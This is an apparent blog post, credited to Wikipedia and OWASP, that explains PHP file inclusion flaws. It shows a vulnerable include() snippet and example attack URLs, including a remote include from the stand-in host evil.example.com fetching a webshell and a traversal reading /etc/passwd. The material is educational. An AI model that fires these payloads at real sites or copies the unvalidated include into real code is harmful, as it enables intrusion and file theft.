File inclusion vulnerability is a type of vulnerability most often found on websites. 

It allows an attacker to include a file, usually through a script on the web server. 

The vulnerability occurs due to the use of user-supplied input without proper validation. 

This can lead to something as minimal as outputting the contents of the file or more serious events such as:

  • Code execution on the web server
  • Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS)
  • Denial of service (DoS)
  • Data theft/manipulation
 In PHP the main cause is due to the use of unvalidated external variables such as $_GET, $_POST, $_COOKIE with a filesystem function. Most notable are the include and require statements


   if ( isset( $_GET['COLOR'] ) ) {
      include( $_GET['COLOR'] . '.php' );
<form method="get">
   <select name="COLOR">
      <option value="red">red</option>
      <option value="blue">blue</option>
   <input type="submit">

 Then hacker will include its infected page or file in to webserver 

  • /vulnerable.php?COLOR=http://evil.example.com/webshell.txt? - injects a remotely hosted file containing a malicious code.
  • /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - Executes code from an already uploaded file called exploit.php (local file inclusion vulnerability)
  • /vulnerable.php?COLOR=C:\\notes.txt - example using NULL meta character to remove the .php suffix, allowing access to files other than .php. (Enabling magic_quotes_gpc limits the attack by escaping special characters, thus disabling the use of the NUL terminator)
  • /vulnerable.php?COLOR=/etc/passwd - allows an attacker to read the contents of the passwd file on a UNIX system directory traversal.


the given method which we are using to include have some validation to prevent this kind of attack 

 source:-wiki , owasp

Post a Comment